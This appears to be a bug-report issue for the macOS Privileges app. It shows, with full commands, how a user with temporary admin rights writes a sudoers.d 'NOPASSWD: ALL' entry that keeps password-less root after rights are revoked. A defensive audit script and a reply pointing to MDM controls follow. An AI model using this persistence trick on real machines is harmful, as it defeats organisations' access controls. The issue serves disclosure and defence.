Temporary admin rights can be prolonged indefinitely with a sudoers.d/ entry
angrox opened this issue
Description
After using the Privileges app once, the status of the app (locked/unlocked) can be bypassed using an entry in the sudoers.d/ directory.
Prerequisites
/etc/sudoers contains a line to include the sudoers.d directory (default in macOS Sonoma and below)
#includedir /etc/sudoers.d
Bypass Example
- Enable Admin mode
PrivilegesCLI --add
User user1 now has admin rights
- Create an entry in /etc/sudoers.d:
# the redirect must be done by root, not by the calling shell, and sudo only
# reads drop-in files whose mode is 0440
sudo tee /etc/sudoers.d/user1 << EOF
user1 ALL = (ALL) NOPASSWD:ALL
EOF
sudo chmod 0440 /etc/sudoers.d/user1
- Remove Admin mode
PrivilegesCLI --remove
User user1 now has standard user rights
- Check sudo permissions
sudo -l
[...]
User user1 may run the following commands on machine1:
(ALL) NOPASSWD: ALL
- Check root access (without password)
sudo whoami
root
The user user1 now has unlimited administrative access.
Possible solution
Config option to allow/disallow sudoers.d entries, or a list of configured entries
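The check the "Possible solution" asks for, written as an added example that is not code from this issue or from the Privileges project: a POSIX shell audit that lists sudoers.d drop-ins granting NOPASSWD: ALL and compares them against an allowlist of expected "file:userspec" entries. The directory path, the allowlist format and the function names are assumptions chosen for the example, not Privileges options, so the same functions can be pointed at a constructed test tree.

```shell
#!/bin/sh
# Added example, not part of the original issue or the Privileges project.
# Audits a sudoers.d-style directory for drop-in rules that grant a user
# password-less root (the persistence trick described in the issue) and
# compares them against an allowlist of expected entries.

# Print "file:userspec" for every rule in DIR matching NOPASSWD:ALL or
# NOPASSWD: ALL. Mirrors sudoers(5) by ignoring file names that contain a
# '.' or end in '~', since sudo never reads those. Comments are stripped.
find_nopasswd_all() {
    dir="$1"
    [ -d "$dir" ] || return 0
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        name=${f##*/}
        case "$name" in
            *.*|*~) continue ;;
        esac
        # sudo ignores drop-ins with permission bits beyond 0440 (e.g. the
        # 0644 a plain write leaves); warn on stderr so a stale-but-ignored
        # file is still visible to the reviewer without polluting the report
        [ "$(ls -ld "$f" | cut -c1-10)" = "-r--r-----" ] ||
            echo "warning: $f is not mode 0440, sudo will ignore it" >&2
        sed -e 's/#.*//' "$f" | awk -v file="$name" '
            $1 != "" && $0 ~ /NOPASSWD:[ \t]*ALL/ { print file ":" $1 }'
    done
}

# Report every finding that is not in ALLOWLIST (newline-separated
# "file:userspec" entries). Returns 1 when anything unexpected was found,
# so the function can gate a monitoring job or a compliance check.
audit_sudoers_d() {
    dir="$1"
    allow="$2"
    status=0
    for hit in $(find_nopasswd_all "$dir"); do
        if printf '%s\n' "$allow" | grep -qxF -- "$hit"; then
            echo "expected   $hit"
        else
            echo "UNEXPECTED $hit"
            status=1
        fi
    done
    return $status
}

# Usage: sh audit_sudoers_d.sh /etc/sudoers.d [allowlist-file]
# (only runs when invoked with arguments, so the functions can be sourced)
if [ $# -gt 0 ]; then
    if [ -n "${2:-}" ]; then
        audit_sudoers_d "$1" "$(cat "$2")"
    else
        audit_sudoers_d "$1" ""
    fi
fi
```

Run it from a LaunchDaemon or an MDM script after every Privileges lock/unlock and alert on a non-zero exit; the allowlist is where the "list of configured entries" from the proposal lives. The user field is reported as written, so group rules (%admin) show up too and can be allowlisted the same way.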
There are a thousand ways for a user to get privilege persistence once admin rights are available (LaunchDaemons, cron entries, Privileged Helper Tools, specialized apps), so this would be an endless game of cat and mouse...
That problem would be better handled by "Service Configuration Files" coming from your MDM (see https://support.apple.com/en-ca/guide/deployment/depdac2c8d89/web), as well as automated monitoring of privilege escalations with another tool.